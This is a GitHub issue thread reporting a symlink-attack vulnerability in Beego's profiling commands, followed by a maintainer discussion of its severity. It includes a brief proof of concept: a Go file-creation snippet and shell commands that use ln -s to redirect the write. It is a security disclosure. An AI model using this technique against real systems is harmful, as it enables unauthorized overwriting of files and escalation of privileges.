New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
get cpuprof and get memprof commands exist symlink-attacks vulnerability. #4484
Comments
|
From my understanding, if attackers could run |
Exactly. Attackers can use this vulnerability to escalate privileges. |
I am still confused. Attackers ran I mean why they don't do something more dangerous directly insteead of running |
What I mean is that in special scenarios, there are unauthorized attacks. The beego application runs under the root permission, and the written pprof file can be created by a low-privilege user using the symlink method, which may cause unauthorized rewriting. |
|
Got it. |
|
There are many similar cases in Beego. For example, the log files. So I think we don't need to do more things about it because if we want to enhance this, we should enhance all similar cases. More importantly, I think users should be responsible for ensuring that their server are safe :( |
Dear beego Team,
I would like to report a security vulnerability in Beego's admin module.
The vulnerability code is in the profile.go file,MemProf and GetCPUProfile function does not correctly check whether the created file exists. As a result, Attackers can launch attacks symlink attacks locally.
poc code:
https://play.golang.org/p/TAvghgm_7fY
func main() {
file, err := os.Create("cpu-pid.pprof")
if err != nil {
fmt.Printf("Error creating file: %s", err)
}
_, err = file.Write([]byte("My logs for this process"))
if err != nil {
fmt.Println(err)
}
}
$ ln -s other/logs cpu-pid.pprof
$ go build symlink_attack.go
$ ./symlink_attack
$ cat other/logs
$
The text was updated successfully, but these errors were encountered: